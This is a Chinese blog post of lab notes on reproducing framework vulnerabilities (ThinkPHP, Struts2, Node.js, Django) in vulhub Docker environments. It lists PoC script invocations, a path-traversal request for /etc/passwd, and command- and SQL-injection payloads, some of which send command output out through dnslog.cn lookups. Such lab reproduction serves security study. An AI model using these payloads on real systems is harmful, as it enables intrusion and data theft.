服务攻防-框架安全(漏洞复现)

已于 2024-07-21 09:39:15 修改
阅读量659 收藏 9
点赞数 12
文章标签: 安全 网络安全 nodejs 框架安全 cve vulhub
于 2024-07-21 09:37:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140583598
版权

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

运行dockers容器

docker exec -it 64052abd288b /bin/bash

thinkphp框架

thinkphp 2 - rce漏洞复现

docker exec -it 731dbae0e0b5 /bin/bash

集成化工具扫描

可以命令执行

thinkphp/5.0.23-rce

集成化工具利用

thinkphp/5-rce

直接梭哈

thinkphp/in-sqlinjection

Struts2

S2-009

梭哈

struts2 命令执行 (CVE-2016-3081)

直接梭哈

061rce和nc

python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"

python2 S2-061-shell.py http://123.58.224.8:64423

S2-062

python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami

靶场无回显

Node.js

目录穿越

GET /static/../../../a/../../../../etc/passwd HTTP/1.1

CVE-2021-21315

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315

配合dnslog。Cn带外检测

/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)

Django

CVE-2019-14234

单引号已注入成功,SQL 语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建 cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用 cmd_exec 执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20

/shiro-721

shiro-cve_2016_4437

solr

小春学渗透
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《2024攻防演练必修高危漏洞集合》
06-19
### 2024攻防演练必修高危漏洞集合 #### 一、前言 随着信息技术的快速发展,网络安全已成为企业不可忽视的关键领域之一。...此外,还可以寻求专业的安全服务提供商的帮助,确保网络系统的安全性和稳定性。
信息网络攻防技术-网络安全.ppt
03-01
信息网络攻防技术-网络安全.ppt
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
Karka_的博客
03-09 1150
ISS中间件(Internet Security and Acceleration ServerMiddleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft ProxyServer和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat ManagementGateway)的前身。
第64天:服务攻防-框架安全&CVE复现&Apache Shiro&Apache Solr
weixin_71529930的博客
04-19 1293
Apache Shiro < 1.4.2 cookie oracle padding 漏洞CVE-2019-12442】Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞CVE-2016-4483】Apache Shiro < 1.5.3 验证绕过漏洞CVE-2020-11989】Apache Shiro < 1.5.2 验证绕过漏洞CVE-2020-1957】Apache Shiro < 1.3.2 验证绕过漏洞CVE-2016-2807】
第63天:服务攻防-框架安全&CVE 复现&Django&Flask&Node.JS&JQuery
weixin_71529930的博客
04-18 1145
在GET参数中构造detail_a'b=123提交,detial是模型Collection中的JSONFiled,并可以看到报错,单引号注入成功(在Django中,JSONFiled是一种特殊的数据库字段类型,存储JSON格式的数据,可以与PostgreSQL数据库一起使用,模型Collection中,detail字段是JSONFile类型的字段,用于存储Collection对象的详细信息,将这些信息存放在JSONFile中的detail字段中字段。kali安装node命令。命令执行地址请求地址。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
rumil的博客
11-02 1739
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
服务攻防-开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现
siu~
01-26 1303
知识点: 1、PHP-框架安全-Thinkphp&Laravel 2、J2EE-框架安全-SpringBoot&Struts2 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
第六十四天 服务攻防-框架安全&CVE复现Apache shiro&Apache Solr
ZL_1618的博客
05-02 1649
1、开发框架-PHP-Laravel-Thinkphp 2、开发框架-Javaweb-St2-Spring 3.开发框架-Python-django-Flask 4、开发框架-Javascript-Node.js-JQuery 5、其他框架Java-Apache Shiro&Apache Sorl
第59天-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 938
本文章涉及Apache、Tomcat及Nginx等中间件重要的CVE漏洞复现
第61天-服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
weixin_52529261的博客
02-19 908
涉及中间件K8s、Docker、Jetty、Websphere相关知识介绍和漏洞利用复现
第60天-服务攻防-中间件安全&CVE 复现&Weblogic&&Jboss&Jenkins&GlassFish
weixin_52529261的博客
02-15 1445
主要学习了解Weblogic、JBoos、Jenkins和GlassFish四个中间件的常见CVE、未授权和弱口令等漏洞
WEB安全漏洞攻防-基础.pptx
08-24
WEB安全漏洞攻防-基础.pptx
内网-内网安全攻防-笔记.pdf
09-18
内网安全攻防涉及到一系列的手段和方法,目的是在内部网络中发现和修补安全漏洞,防止未授权访问,确保网络和数据的安全。 一、内网渗透测试基础 1. PowerShell简介 PowerShell是微软推出的一个基于.NET框架的任务...
WEB安全漏洞攻防-基础.zip
10-25
WEB安全漏洞攻防-基础
AI安全-文生图
深度安全实验室
08-15 461
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
最新发布
XINERTEL的博客
08-21 728
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 335
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 426
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
qvd-2023-45061漏洞复现
12-25
qvd-2023-45061漏洞是指某个系统或软件中存在的安全漏洞。为了验证这个漏洞,需要进行漏洞复现,即重现漏洞的过程。首先,需要在具有相同环境和配置的测试系统上进行操作。其次,需要根据漏洞的描述和已知信息,尝试触发漏洞并记录操作步骤和结果。在进行漏洞复现的过程中,需要注意保护好测试环境,避免对系统造成实际危害。 在qvd-2023-45061漏洞复现的过程中,可以尝试利用已知的payload或者编写自定义的代码来触发漏洞,记录漏洞触发的条件和效果。在复现过程中,也可以尝试不同的输入和操作,寻找漏洞的边界和影响范围。同时,需要及时记录复现的过程和结果,以便进一步的分析和修复。 当漏洞成功复现后,应该及时向相关安全团队或厂商报告漏洞,并提供详细的复现过程和结果。漏洞复现的结果将有助于安全团队更好地理解漏洞的本质和影响,有助于及时修复和防范类似的漏洞。此外,漏洞复现也是安全研究和攻防技术提升的重要手段,通过复现漏洞可以加深对漏洞原理和利用方法的理解,提高安全防护和应对能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值